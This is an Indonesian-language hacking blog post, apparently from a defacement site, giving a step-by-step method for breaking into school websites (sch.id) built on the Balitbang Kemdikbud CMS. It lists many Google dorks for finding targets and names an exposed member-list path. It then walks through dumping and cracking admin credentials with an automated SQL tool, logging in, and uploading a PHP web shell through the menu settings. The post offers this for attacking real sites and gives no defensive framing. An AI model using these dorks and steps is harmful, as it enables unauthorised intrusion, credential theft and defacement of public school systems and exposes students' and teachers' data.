Deface web with auto sql balitbang method

Avatar photo
Assalamualaikum wr.wb Kali ini mimin
akan mengshare cara mendeface di cms balitbang

BAHAN

  • 1. Shell Backdoor
  • 2. Google chrome / browser
  • 3. Hp / laptop
  • 4. Tools auto sql balitbang touch me senpai
  • 5. Tools Crack Password sql balitbang touch me senpai
  • 6. Dork / exploit:

DorK BalitBang

> inurl:/html/index.php site:sch.id 

> inurl:/html/siswa site:sch.id 

> inurl:/html/guru site:sch.id 

> inurl:/html/alumni site:sch.id

> inurl:member/daftar.php intext:NAMAKOTA

> inurl:/sch.id Team balitbang intext:NAMAKOTA

> intext:”Kamfret Team”sch.id Team Balitbang

> inurl:/member/daftar.php

> inurl:”/html/index.php” intext:”Tim Balitbang”

> inurl:”/html/index.php” intitle:”Selamat Datang”

> inurl:”/member/” intext:”Tim Balitbang”

> inurl:”/html/siswa.php?”

> inurl:”/html/alumni.php?”

> inurl:”/html/guru.php?”

> inurl:/member/daftar.php intext:”namakota”

> inurl:/member/ site:sch.id “selamat datang di komunitas”

> inurl:/elearning/ “password” site:sch.id

> inurl:/member/index.php “Tim Balitbang Kemdikbud versi”

> inurl:/user/index.php “Tim Balitbang Kemdikbud versi”

> inurl:/member/user site:sch.id

> inurl:agenda site:sch.id “tim balitbang”

> inurl:artikel site:sch.id “tim balitbang”

> inurl:info site:sch.id “tim balitbang”

> inurl:buku site:sch.id “tim balitbang”

> inurl:”bukutamu” site:sch.id “tim balitbang”

> inurl:”opini” site:sch.id “tim balitbang”

> inurl:”link” site:sch.id “tim balitbang”

> inurl:”galeri” site:sch.id “tim balitbang”

> inurl:”album” site:sch.id “tim balitbang”

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

180707

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

190116

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

181128

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

170317

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

181016

Website engine’s code is copyright © 2017 Tim Balitbang Kemdikbud versi

180313

member/listmemberall.php

users/listmemberall.php

Jika vuln website nya akan blank. Ya langsung saja

  • 1. Kalian ngedorking dulu di google/browser

Jika sudah kalian pilih salah satu website. Dan mimin sudah mendapatkan website nya jadi tinggal gasken

Dan jika sudah masukan exploit 
member/listmemberall.php

dan untuk admin login nya
/admin
/adminpanel
/login
Jika sudah masuk ke tools auto sql balitbang
dan tempelkan website yang kalian mau eksekusi tadi
Jika vuln akan mendapatkan user password nya

Kalian pilih salah satu, sesudah itu kalian masuk ke tools auto crack sql balitbang

Jika vuln maka akan ke hash password nya. Kita langsung saja masuk ke admin login

Kalian isi user / password yang kalian dapet tadi, kalo vuln akan redirect ke dashboard.

Dan ya, kalian bebas mau ngapain. Jika mau upload shell kalian klik setting admin > Posisi menu medul

Klik Tambah posisi menu



Dan disini kita bisa upload shell, dan untuk extensi nya .php

dan cara manggil shell nya, /modul/tag_namashell.php
Dan jika pas upload shell 403 forbidden itu artinya shell sudah terupload.

Dan itu shell yang sudah ke upload. Yang paling penting jangan di tebas index oke!
Mimin akhiri assalamualaikum wr.wb
Spesial Thanks To : Malaikat h4lu

Total
0
Shares
Leave a Reply

Your email address will not be published. Required fields are marked *

Previous Post

Cara Mudah Hack CPanel Suatu Website

Next Post

Objdump Tutorial – Reverse Engineering

Related Posts